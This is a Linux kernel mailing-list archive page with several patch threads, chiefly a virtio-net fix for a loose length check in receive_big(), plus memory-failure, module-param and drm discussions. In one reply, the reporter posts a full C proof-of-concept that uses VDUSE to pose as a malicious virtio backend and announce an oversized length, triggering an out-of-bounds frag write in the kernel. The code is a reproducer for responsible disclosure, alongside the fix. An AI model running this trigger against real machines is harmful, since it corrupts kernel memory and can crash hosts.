For example, if the pending work timer below fires, vsock_pending_work()
will see vsock_is_pending() is true, and then hit sk_acceptq_removed()
and underflow the zero backlog counter?

Best,
Bobby

^ permalink raw reply

* Re: [PATCH net] virtio-net: fix len check in receive_big()
From: Xiang Mei @ 2026-06-10 22:43 UTC (permalink / raw)
  To: Michael S. Tsirkin
  Cc: jasowang, xuanzhuo, eperezma, andrew+netdev, davem, edumazet,
	kuba, pabeni, netdev, virtualization, linux-kernel,
	minhquangbui99, bestswngs
In-Reply-To: <20260610181911-mutt-send-email-mst@kernel.org>

Thanks for the quick reply. It comes faster than my reproduction email!

On Wed, Jun 10, 2026 at 3:22 PM Michael S. Tsirkin <mst@redhat.com> wrote:
>
> On Wed, Jun 10, 2026 at 03:16:06PM -0700, Xiang Mei wrote:
> > receive_big() bounds the device-announced length by
> > (big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
> > add_recvbuf_big() sets sg[1] to start at offset
> > sizeof(struct padded_vnet_hdr) into the first page, so the chain
> > actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
> > big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
> > check allows for the common hdr_len == 12 case.
> >
> > A malicious virtio backend can announce a len in that gap.  page_to_skb()
> > then walks one frag past the page chain, storing a NULL page->private
> > into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
> > write past the static frag array and a NULL frag handed up the rx path.
> > Bound len by the size add_recvbuf_big() actually advertised.
> >
> > Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
> > Reported-by: Weiming Shi <bestswngs@gmail.com>
> > Signed-off-by: Xiang Mei <xmei5@asu.edu>
>
> Let's instead (or additionally?), bound the frags array index.
>
> Seems more robust.

Good call! I'll keep the length tightening in receive_big() and also
harden the page_to_skb() frag loop. So it can't index past
MAX_SKB_FRAGS or walk a NULL chain page, independent of what length
the caller validated. v2 will have both.

>
> > ---
> >  drivers/net/virtio_net.c | 8 +++++---
> >  1 file changed, 5 insertions(+), 3 deletions(-)
> >
> > diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> > index f4adcfee7a80..afe73eda1491 100644
> > --- a/drivers/net/virtio_net.c
> > +++ b/drivers/net/virtio_net.c
> > @@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
> >                                  struct virtnet_rq_stats *stats)
> >  {
> >       struct page *page = buf;
> > +     unsigned long max_len;
> >       struct sk_buff *skb;
> >
> >       /* Make sure that len does not exceed the size allocated in
> >        * add_recvbuf_big.
> >        */
> > -     if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
> > +     max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
> > +               vi->big_packets_num_skbfrags * PAGE_SIZE;
> > +     if (unlikely(len > max_len)) {
> >               pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
> > -                      dev->name, len,
> > -                      (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
> > +                      dev->name, len, max_len);
> >               goto err;
> >       }
> >
> > --
> > 2.43.0
>

^ permalink raw reply

* Re: [PATCH net] virtio-net: fix len check in receive_big()
From: Xiang Mei @ 2026-06-10 22:39 UTC (permalink / raw)
  To: mst, jasowang, xuanzhuo, eperezma
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs
In-Reply-To: <20260610221606.1091465-1-xmei5@asu.edu>

Thanks for your attention to this bug. We'll provide some tips for
reproduction here
1) CONFIGs
```
CONFIG_VDPA=y
CONFIG_VDPA_USER=y
CONFIG_VIRTIO_VDPA=y
CONFIG_VHOST_VDPA=y
CONFIG_IKHEADERS=n
CONFIG_DEBUG_INFO_BTF=n
```

2) PoC
```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <poll.h>
#include <stdint.h>
#include <pthread.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/sockios.h>
#include <linux/netlink.h>
#include <linux/genetlink.h>
#include <linux/vduse.h>
#include <linux/vdpa.h>
#include <linux/virtio_ids.h>
#include <linux/virtio_config.h>
#include <linux/virtio_net.h>
#include <linux/virtio_ring.h>

#define DEV_NAME "vdusebug"
#define BIT(x) (1ULL << (x))
#define FEATURES (BIT(VIRTIO_F_VERSION_1) | BIT(VIRTIO_F_ACCESS_PLATFORM) | \
BIT(VIRTIO_NET_F_MAC) | BIT(VIRTIO_NET_F_GUEST_TSO4))
#define VQ_NUM 2
#define VQ_SIZE 256
#define die(s) do { perror(s); exit(1); } while (0)

/* ---- minimal generic-netlink: resolve vdpa family, then
VDPA_CMD_DEV_NEW ---- */

struct nlmsg {
struct nlmsghdr nh;
struct genlmsghdr gh;
char buf[1024];
};

static void nla_put(struct nlmsg *m, int type, const void *data, int len)
{
struct nlattr *a = (void *)((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len));
a->nla_type = type;
a->nla_len = NLA_HDRLEN + len;
memcpy((char *)a + NLA_HDRLEN, data, len);
m->nh.nlmsg_len = NLMSG_ALIGN(m->nh.nlmsg_len) + NLA_ALIGN(NLA_HDRLEN + len);
}

static int nl_send(int sk, struct nlmsg *m, char *rsp, int rsplen)
{
struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
struct iovec iov = { .iov_base = m, .iov_len = m->nh.nlmsg_len };
struct msghdr mh = { .msg_name = &sa, .msg_namelen = sizeof(sa),
.msg_iov = &iov, .msg_iovlen = 1 };
if (sendmsg(sk, &mh, 0) < 0)
return -1;
return recv(sk, rsp, rsplen, 0);
}

static int vdpa_setup(int sk)
{
struct nlmsg m = {0};
char rsp[4096];
int n, famid = -1;

/* resolve VDPA genl family id */
m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(m.gh));
m.nh.nlmsg_type = GENL_ID_CTRL;
m.nh.nlmsg_flags = NLM_F_REQUEST;
m.gh.cmd = CTRL_CMD_GETFAMILY;
m.gh.version = 1;
nla_put(&m, CTRL_ATTR_FAMILY_NAME, VDPA_GENL_NAME, strlen(VDPA_GENL_NAME) + 1);
n = nl_send(sk, &m, rsp, sizeof(rsp));
for (struct nlmsghdr *nh = (void *)rsp; NLMSG_OK(nh, n); nh =
NLMSG_NEXT(nh, n)) {
struct nlattr *a = (void *)((char *)NLMSG_DATA(nh) +
NLMSG_ALIGN(sizeof(struct genlmsghdr)));
int rem = NLMSG_PAYLOAD(nh, sizeof(struct genlmsghdr));
while (rem >= (int)NLA_HDRLEN && a->nla_len >= NLA_HDRLEN && rem >=
a->nla_len) {
if (a->nla_type == CTRL_ATTR_FAMILY_ID)
famid = *(uint16_t *)((char *)a + NLA_HDRLEN);
rem -= NLA_ALIGN(a->nla_len);
a = (void *)((char *)a + NLA_ALIGN(a->nla_len));
}
}
if (famid < 0)
return -1;

/* VDPA_CMD_DEV_NEW name=DEV_NAME mgmtdev=vduse */
memset(&m, 0, sizeof(m));
m.nh.nlmsg_len = NLMSG_LENGTH(sizeof(m.gh));
m.nh.nlmsg_type = famid;
m.nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
m.gh.cmd = VDPA_CMD_DEV_NEW;
m.gh.version = 1;
nla_put(&m, VDPA_ATTR_DEV_NAME, DEV_NAME, strlen(DEV_NAME) + 1);
nla_put(&m, VDPA_ATTR_MGMTDEV_DEV_NAME, "vduse", 6);
return nl_send(sk, &m, rsp, sizeof(rsp)) > 0 ? 0 : -1;
}

/* ---- VDUSE control message worker + IOTLB mapping ---- */

static volatile int g_driver_ok, g_running = 1;

static void *vduse_worker(void *arg)
{
int fd = (intptr_t)arg;
struct pollfd pfd = { .fd = fd, .events = POLLIN };
while (g_running) {
if (poll(&pfd, 1, 100) <= 0)
continue;
struct vduse_dev_request req = {0};
struct vduse_dev_response resp = {0};
if (read(fd, &req, sizeof(req)) < 0)
continue;
resp.request_id = req.request_id;
resp.result = VDUSE_REQ_RESULT_OK;
if (req.type == VDUSE_GET_VQ_STATE)
resp.vq_state.index = req.vq_state.index;
else if (req.type == VDUSE_SET_STATUS && (req.s.status &
VIRTIO_CONFIG_S_DRIVER_OK))
g_driver_ok = 1;
write(fd, &resp, sizeof(resp));
}
return NULL;
}

/* map one IOVA page into our address space, returning the VA for `iova` */
static void *iova_map(int fd, uint64_t iova, int prot)
{
struct vduse_iotlb_entry e = { .start = iova, .last = iova };
int mfd = ioctl(fd, VDUSE_IOTLB_GET_FD, &e);
if (mfd < 0)
return NULL;
void *p = mmap(0, e.last - e.start + 1, prot, MAP_SHARED, mfd, e.offset);
close(mfd);
if (p == MAP_FAILED)
return NULL;
return (char *)p + (iova - e.start);
}

/* ---- trigger ---- */

static void trigger(int fd)
{
struct vduse_vq_info info = { .index = 0 };
if (ioctl(fd, VDUSE_VQ_GET_INFO, &info) < 0 || !info.ready)
return;
uint32_t num = info.num;

struct vring_desc *desc = iova_map(fd, info.desc_addr, PROT_READ);
struct vring_avail *avail = iova_map(fd, info.driver_addr, PROT_READ);
struct vring_used *used = iova_map(fd, info.device_addr, PROT_READ |
PROT_WRITE);
if (!desc || !avail || !used || used->idx == avail->idx)
return;

/* the driver posted an RX chain; just hand it back an inflated len.
* 73708 is what add_recvbuf_big() advertised; 73728 = (17+1)*4096
* passes the loose check and overruns page_to_skb()'s frag loop. */
uint16_t head = avail->ring[used->idx % num];
used->ring[used->idx % num] = (struct vring_used_elem){ .id = head,
.len = (17 + 1) * 4096 };
__sync_synchronize();
used->idx++;
__sync_synchronize();

uint32_t qidx = 0;
ioctl(fd, VDUSE_VQ_INJECT_IRQ, &qidx);
}

/* bring up every virtio_net iface (the VDUSE one) so the driver fills RX */
static void ifaces_up(void)
{
int s = socket(AF_INET, SOCK_DGRAM, 0);
for (int i = 1; i < 16; i++) {
struct ifreq r = {0};
snprintf(r.ifr_name, IFNAMSIZ, "eth%d", i);
if (ioctl(s, SIOCGIFFLAGS, &r) < 0)
continue;
r.ifr_flags |= IFF_UP | IFF_RUNNING;
ioctl(s, SIOCSIFFLAGS, &r);
}
close(s);
}

int main(void)
{
pthread_t th;

int ctrl = open("/dev/vduse/control", O_RDWR);
if (ctrl < 0)
die("/dev/vduse/control");
uint64_t apiv = 0;
ioctl(ctrl, VDUSE_SET_API_VERSION, &apiv);

struct {
struct vduse_dev_config cfg;
struct virtio_net_config net;
} c = {0};
uint8_t mac[6] = { 0x52, 0x54, 0, 0x12, 0x34, 0x56 };
memcpy(c.net.mac, mac, 6);
strncpy(c.cfg.name, DEV_NAME, VDUSE_NAME_MAX - 1);
c.cfg.device_id = VIRTIO_ID_NET;
c.cfg.features = FEATURES;
c.cfg.vq_num = VQ_NUM;
c.cfg.vq_align = 4096;
c.cfg.config_size = sizeof(struct virtio_net_config);
if (ioctl(ctrl, VDUSE_CREATE_DEV, &c) < 0)
die("VDUSE_CREATE_DEV");

int fd = open("/dev/vduse/" DEV_NAME, O_RDWR | O_NONBLOCK);
if (fd < 0)
die("open vduse dev");
for (uint32_t i = 0; i < VQ_NUM; i++) {
struct vduse_vq_config vc = { .index = i, .max_size = VQ_SIZE };
ioctl(fd, VDUSE_VQ_SETUP, &vc);
}

/* worker must run before we attach: the bus probe blocks on its replies */
pthread_create(&th, NULL, vduse_worker, (void *)(intptr_t)fd);

int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_GENERIC);
struct sockaddr_nl sa = { .nl_family = AF_NETLINK };
bind(sk, (void *)&sa, sizeof(sa));
if (vdpa_setup(sk) < 0)
die("vdpa setup");

for (int i = 0; i < 50 && !g_driver_ok; i++)
usleep(100000);
ifaces_up();
for (int i = 0; i < 30; i++)
usleep(100000);

for (int i = 0; i < 10; i++) {
trigger(fd);
usleep(200000);
}

g_running = 0;
pthread_join(th, NULL);
sleep(2);
return 0;
}
```

Let me know if you need more information.

Thanks,
Xiang

On Wed, Jun 10, 2026 at 3:16 PM Xiang Mei <xmei5@asu.edu> wrote:
>
> receive_big() bounds the device-announced length by
> (big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
> add_recvbuf_big() sets sg[1] to start at offset
> sizeof(struct padded_vnet_hdr) into the first page, so the chain
> actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
> big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
> check allows for the common hdr_len == 12 case.
>
> A malicious virtio backend can announce a len in that gap.  page_to_skb()
> then walks one frag past the page chain, storing a NULL page->private
> into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
> write past the static frag array and a NULL frag handed up the rx path.
>
> Bound len by the size add_recvbuf_big() actually advertised.
>
> Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
>  drivers/net/virtio_net.c | 8 +++++---
>  1 file changed, 5 insertions(+), 3 deletions(-)
>
> diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> index f4adcfee7a80..afe73eda1491 100644
> --- a/drivers/net/virtio_net.c
> +++ b/drivers/net/virtio_net.c
> @@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
>                                    struct virtnet_rq_stats *stats)
>  {
>         struct page *page = buf;
> +       unsigned long max_len;
>         struct sk_buff *skb;
>
>         /* Make sure that len does not exceed the size allocated in
>          * add_recvbuf_big.
>          */
> -       if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
> +       max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
> +                 vi->big_packets_num_skbfrags * PAGE_SIZE;
> +       if (unlikely(len > max_len)) {
>                 pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
> -                        dev->name, len,
> -                        (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
> +                        dev->name, len, max_len);
>                 goto err;
>         }
>
> --
> 2.43.0
>

^ permalink raw reply

* Re: [PATCH net] virtio-net: fix len check in receive_big()
From: Michael S. Tsirkin @ 2026-06-10 22:21 UTC (permalink / raw)
  To: Xiang Mei
  Cc: jasowang, xuanzhuo, eperezma, andrew+netdev, davem, edumazet,
	kuba, pabeni, netdev, virtualization, linux-kernel,
	minhquangbui99, bestswngs
In-Reply-To: <20260610221606.1091465-1-xmei5@asu.edu>

On Wed, Jun 10, 2026 at 03:16:06PM -0700, Xiang Mei wrote:
> receive_big() bounds the device-announced length by
> (big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
> add_recvbuf_big() sets sg[1] to start at offset
> sizeof(struct padded_vnet_hdr) into the first page, so the chain
> actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
> big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
> check allows for the common hdr_len == 12 case.
> 
> A malicious virtio backend can announce a len in that gap.  page_to_skb()
> then walks one frag past the page chain, storing a NULL page->private
> into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
> write past the static frag array and a NULL frag handed up the rx path.
> Bound len by the size add_recvbuf_big() actually advertised.
> 
> Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>

Let's instead (or additionally?), bound the frags array index.

Seems more robust.

> ---
>  drivers/net/virtio_net.c | 8 +++++---
>  1 file changed, 5 insertions(+), 3 deletions(-)
> 
> diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> index f4adcfee7a80..afe73eda1491 100644
> --- a/drivers/net/virtio_net.c
> +++ b/drivers/net/virtio_net.c
> @@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
>  				   struct virtnet_rq_stats *stats)
>  {
>  	struct page *page = buf;
> +	unsigned long max_len;
>  	struct sk_buff *skb;
>  
>  	/* Make sure that len does not exceed the size allocated in
>  	 * add_recvbuf_big.
>  	 */
> -	if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
> +	max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
> +		  vi->big_packets_num_skbfrags * PAGE_SIZE;
> +	if (unlikely(len > max_len)) {
>  		pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
> -			 dev->name, len,
> -			 (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
> +			 dev->name, len, max_len);
>  		goto err;
>  	}
>  
> -- 
> 2.43.0


^ permalink raw reply

* [PATCH net] virtio-net: fix len check in receive_big()
From: Xiang Mei @ 2026-06-10 22:16 UTC (permalink / raw)
  To: mst, jasowang, xuanzhuo, eperezma
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs,
	Xiang Mei

receive_big() bounds the device-announced length by
(big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
add_recvbuf_big() sets sg[1] to start at offset
sizeof(struct padded_vnet_hdr) into the first page, so the chain
actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
check allows for the common hdr_len == 12 case.

A malicious virtio backend can announce a len in that gap.  page_to_skb()
then walks one frag past the page chain, storing a NULL page->private
into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
write past the static frag array and a NULL frag handed up the rx path.

Bound len by the size add_recvbuf_big() actually advertised.

Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
 drivers/net/virtio_net.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index f4adcfee7a80..afe73eda1491 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
 				   struct virtnet_rq_stats *stats)
 {
 	struct page *page = buf;
+	unsigned long max_len;
 	struct sk_buff *skb;
 
 	/* Make sure that len does not exceed the size allocated in
 	 * add_recvbuf_big.
 	 */
-	if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
+	max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
+		  vi->big_packets_num_skbfrags * PAGE_SIZE;
+	if (unlikely(len > max_len)) {
 		pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
-			 dev->name, len,
-			 (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
+			 dev->name, len, max_len);
 		goto err;
 	}
 
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH splitout] mm: memory-failure: serialize TestSetPageHWPoison with zone->lock
From: Michael S. Tsirkin @ 2026-06-10 21:18 UTC (permalink / raw)
  To: Miaohe Lin
  Cc: Zi Yan, David Hildenbrand (Arm), Andrew Morton, linux-kernel,
	Jason Wang, Xuan Zhuo, Eugenio Pérez, Muchun Song,
	Oscar Salvador, Lorenzo Stoakes, Liam R. Howlett, Vlastimil Babka,
	Mike Rapoport, Suren Baghdasaryan, Michal Hocko, Brendan Jackman,
	Johannes Weiner, Baolin Wang, Nico Pache, Ryan Roberts, Dev Jain,
	Barry Song, Lance Yang, Hugh Dickins, Matthew Brost, Joshua Hahn,
	Rakie Kim, Byungchul Park, Gregory Price, Ying Huang,
	Alistair Popple, Christoph Lameter, David Rientjes,
	Roman Gushchin, Harry Yoo, Axel Rasmussen, Yuanchu Xie, Wei Xu,
	Chris Li, Kairui Song, Kemeng Shi, Nhat Pham, Baoquan He,
	virtualization, linux-mm, Andrea Arcangeli, Naoya Horiguchi
In-Reply-To: <dd8d89be-9c73-8ff7-7d44-9705bddeda4d@huawei.com>

On Wed, Jun 10, 2026 at 03:24:30PM +0800, Miaohe Lin wrote:
> On 2026/6/10 5:00, Michael S. Tsirkin wrote:
> > On Tue, Jun 09, 2026 at 04:54:01PM -0400, Zi Yan wrote:
> >> On 9 Jun 2026, at 16:34, Michael S. Tsirkin wrote:
> >>
> >>> On Tue, Jun 09, 2026 at 02:52:47PM -0400, Zi Yan wrote:
> >>>> On 9 Jun 2026, at 14:39, Zi Yan wrote:
> >>>>
> >>>>> On 9 Jun 2026, at 14:38, David Hildenbrand (Arm) wrote:
> >>>>>
> >>>>>> On 6/9/26 20:10, Andrew Morton wrote:
> >>>>>>> On Tue, 9 Jun 2026 06:12:49 -0400 "Michael S. Tsirkin" <mst@redhat.com> wrote:
> >>>>>>>
> >>>>>>>> TestSetPageHWPoison() is called without zone->lock, so its atomic
> >>>>>>>> update to page->flags can race with non-atomic flag operations
> >>>>>>>> that run under zone->lock in the buddy allocator.
> >>>>>>>>
> >>>>>>>> In particular, __free_pages_prepare() does:
> >>>>>>>>
> >>>>>>>>     page->flags.f &= ~PAGE_FLAGS_CHECK_AT_PREP;
> >>>>>>>>
> >>>>>>>> This non-atomic read-modify-write, while correctly excluding
> >>>>>>>> __PG_HWPOISON from the mask, can still lose a concurrent
> >>>>>>>> TestSetPageHWPoison if the read happens before the poison bit
> >>>>>>>> is set and the write happens after.  Will only get worse if/when
> >>>>>>>> we add more non-atomic flag operations.
> >>>>>>>>
> >>>>>>>> Fix by acquiring zone->lock around TestSetPageHWPoison and
> >>>>>>>> around ClearPageHWPoison in the retry path.  This
> >>>>>>>> serializes with all buddy flag manipulation.  The cost is
> >>>>>>>> negligible: one lock/unlock in an extremely rare path
> >>>>>>>> (hardware memory errors).
> >>>>>>>>
> >>>>>>>> Note: SetPageHWPoison and TestClearPageHWPoison calls elsewhere
> >>>>>>>> in this file operate on pages already removed from the buddy
> >>>>>>>> allocator or on non-buddy pages (DAX, hugetlb), so they do not
> >>>>>>>> need zone->lock protection.
> >>>>>>>
> >>>>>>> Sashiko is saying this doesn't do anything "Because
> >>>>>>> __free_pages_prepare() executes entirely locklessly".  Did it goof?
> >>>>>>>
> >>>>>>> https://sashiko.dev/#/patchset/df06b66fe4ff8e925ee0714955abc2183a727b90.1780998980.git.mst@redhat.com
> >>>>>>
> >>>>>> Battle of the bots: it's right.
> >>>>>
> >>>>> Yep, __free_pages_prepare() changes the page flag without holding
> >>>>> zone->lock.
> >>>>
> >>>> __free_pages_prepare() works on frozen pages and assumes no one else
> >>>> touches the input page. To avoid this race, memory_failure() might
> >>>> want to try_get_page() before TestClearPageHWPoison(), but I am not
> >>>> sure if that works along with memory failure flow.
> >>>>
> >>>> Best Regards,
> >>>> Yan, Zi
> >>>
> >>>
> >>>
> >>> Actually memory failure already plays with this down the road no?
> >>>
> >>> So maybe it's enough to just SetPageHWPoison afterwards again?
> >>>
> >>>
> >>> diff --git a/mm/memory-failure.c b/mm/memory-failure.c
> >>> index ee42d4361309..4758fea94a96 100644
> >>> --- a/mm/memory-failure.c
> >>> +++ b/mm/memory-failure.c
> >>> @@ -2415,6 +2415,7 @@ int memory_failure(unsigned long pfn, int flags)
> >>>  	if (!res) {
> >>>  		if (is_free_buddy_page(p)) {
> >>>  			if (take_page_off_buddy(p)) {
> >>> +				SetPageHWPoison(p);
> >>>  				page_ref_inc(p);
> >>>  				res = MF_RECOVERED;
> >>>  			} else {
> >>>
> >>>
> >>> and maybe in a bunch of other places in there?
> >>
> >> You mean for fear of losing HWPoison flag in the earlier TestSetPageHWPoison(),
> >> just set it again here?
> > 
> > Yea.
> > 
> >> Why not do it after get_hwpoison_page(), since that
> >> is the expected page flag?
> > 
> > It's still in the buddy at that point right? I'm worried buddy might
> > poke at flags.
> 
> Since __free_pages_prepare() executes entirely locklessly, the only way to ensure
> HWPoison flag won't be lost might be only set hwpoison flag iff we can make sure
> pages are not on the way to buddy...
> 
> Thanks.
> .


To clarify do you not agree repeating SetPageHWPoison is enough for
this? And if not, do you have suggestions on how to fix this race?

Thanks a lot,

-- 
MST


^ permalink raw reply

* Re: [PATCH 04/11] treewide: Convert struct kernel_param_ops initializers to DEFINE_KERNEL_PARAM_OPS
From: jim.cromie @ 2026-06-10 21:06 UTC (permalink / raw)
  To: Petr Pavlu
  Cc: Kees Cook, Luis Chamberlain, Pengpeng Hou, Richard Weinberger,
	Anton Ivanov, Johannes Berg, Rafael J. Wysocki, Len Brown,
	Corey Minyard, Gabriel Somlo, Michael S. Tsirkin, Jani Nikula,
	Joonas Lahtinen, Rodrigo Vivi, Tvrtko Ursulin, David Airlie,
	Simona Vetter, Bart Van Assche, Jason Gunthorpe, Leon Romanovsky,
	Laurent Pinchart, Hans de Goede, Mauro Carvalho Chehab,
	Bjorn Helgaas, Hannes Reinecke, James E.J. Bottomley,
	Martin K. Petersen, Daniel Lezcano, Zhang Rui, Lukasz Luba,
	Greg Kroah-Hartman, Jiri Slaby, Alan Stern, Jason Wang, Xuan Zhuo,
	Eugenio Pérez, Jason Baron, Tiwei Bie, Benjamin Berg,
	Ilpo Järvinen, David E. Box, Maciej W. Rozycki,
	Srinivas Pandruvada, Peter Zijlstra, Heiko Carstens,
	Vasily Gorbik, Sean Christopherson, Paolo Bonzini,
	Thomas Gleixner, Ingo Molnar, Borislav Petkov, Dave Hansen, x86,
	H. Peter Anvin, Vinod Koul, Frank Li, Daniel Gomez, Sami Tolvanen,
	Aaron Tomlin, Alexander Potapenko, Marco Elver, Dmitry Vyukov,
	Andrew Morton, John Johansen, Paul Moore, James Morris,
	Serge E. Hallyn, Andy Shevchenko, Georgia Garcia, kvm, dmaengine,
	linux-modules, kasan-dev, linux-mm, apparmor,
	linux-security-module, linux-um, linux-acpi, openipmi-developer,
	qemu-devel, intel-gfx, dri-devel, linux-rdma, linux-media,
	linux-pci, linux-scsi, linux-pm, linuxppc-dev, linux-serial,
	linux-usb, usb-storage, virtualization, linux-kernel, linux-arch,
	netdev, linux-fsdevel, linux-hardening
In-Reply-To: <da358ae1-91b4-4a16-ac76-ffab99c230b9@suse.com>

On Mon, May 25, 2026 at 7:35 AM Petr Pavlu <petr.pavlu@suse.com> wrote:
>
> On 5/21/26 3:33 PM, Kees Cook wrote:
> > Using Coccinelle, rewrite every struct kernel_param_ops initializer that
> > sets .get into a DEFINE_KERNEL_PARAM_OPS-family macro invocation,
> > for example:
> >
> > @@
> > declarer name DEFINE_KERNEL_PARAM_OPS;
> > identifier OPS;
> > expression SET, GET;
> > @@
> > - const struct kernel_param_ops OPS = {
> > -       .set = SET,
> > -       .get = GET,
> > - };
> > + DEFINE_KERNEL_PARAM_OPS(OPS, SET, GET);
> >
> > Using the macro for initialization means future changes can manipulate
> > the struct layout and callback prototypes without having to change every
> > initializer.
>
> Nit: For consistency, I suggest also converting the few remaining
> kernel_param_ops instances that specify only .set and no .get, such as
> simdisk_param_ops_filename.
>
> --
> Thanks,
> Petr

for the dynamic-debug changes

Reviewed-by: Jim Cromie <jim.cromie@gmail.com>

^ permalink raw reply

* Re: [PATCH] drm: Consistently define pci_device_ids using named initializers
From: Patrik Jakobsson @ 2026-06-10 19:24 UTC (permalink / raw)
  To: Uwe Kleine-König (The Capable Hub)
  Cc: Maarten Lankhorst, Maxime Ripard, Thomas Zimmermann, David Airlie,
	Simona Vetter, Gerd Hoffmann, Markus Schneider-Pargmann,
	Jianmin Lv, Qianhai Wu, Huacai Chen, Mingcong Bai, Xi Ruoyao,
	Icenowy Zheng, Dave Airlie, Jocelyn Falempe, dri-devel,
	linux-kernel, virtualization, spice-devel
In-Reply-To: <20260504150537.2136760-2-u.kleine-koenig@baylibre.com>

On Mon, May 4, 2026 at 5:05 PM Uwe Kleine-König (The Capable Hub)
<u.kleine-koenig@baylibre.com> wrote:
>
> The .driver_data member of the various struct pci_device_id arrays were
> initialized by list expressions. This isn't easily readable if you're
> not into PCI. Using the PCI_DEVICE macro and named initializers is more
> explicit and thus easier to parse. Also skip explicit assignments of 0
> (which the compiler then takes care of).
>
> This change doesn't introduce changes to the compiled pci_device_id
> arrays. Tested on x86 and arm64.
>
> Signed-off-by: Uwe Kleine-König (The Capable Hub) <u.kleine-koenig@baylibre.com>

Reviewed-by: Patrik Jakobsson <patrik.r.jakobsson@gmail.com>

Since it touches multiple drivers, perhaps a drm-misc maintainer can take this?

-Patrik

> ---
> Hello,
>
> The secret plan is to make struct pci_device_id::driver_data an
> anonymous union (similar to
> https://lore.kernel.org/all/cover.1776579304.git.u.kleine-koenig@baylibre.com/)
> and that requires named initializers. But IMHO it's also a nice cleanup
> on its own.
>
> The anonymous union will allow changes like the following:
>
> -       { PCI_DEVICE(0x8086, 0x8108), .driver_data = (long) &psb_chip_ops },
> +       { PCI_DEVICE(0x8086, 0x8108), .driver_data_ptr = &psb_chip_ops },
>
> (together with the respective change in the code when the value is
> used). This gets rid of a bunch of casts and thus slightly improves
> type safety.
>
> Best regards
> Uwe
>
>  drivers/gpu/drm/gma500/psb_drv.c      | 56 +++++++++++++--------------
>  drivers/gpu/drm/loongson/lsdc_drv.c   |  4 +-
>  drivers/gpu/drm/mgag200/mgag200_drv.c | 24 ++++++------
>  drivers/gpu/drm/qxl/qxl_drv.c         | 15 ++++---
>  4 files changed, 52 insertions(+), 47 deletions(-)
>
> diff --git a/drivers/gpu/drm/gma500/psb_drv.c b/drivers/gpu/drm/gma500/psb_drv.c
> index 005ab7f5355f..039da26ef24d 100644
> --- a/drivers/gpu/drm/gma500/psb_drv.c
> +++ b/drivers/gpu/drm/gma500/psb_drv.c
> @@ -56,36 +56,36 @@ static int psb_pci_probe(struct pci_dev *pdev, const struct pci_device_id *ent);
>   */
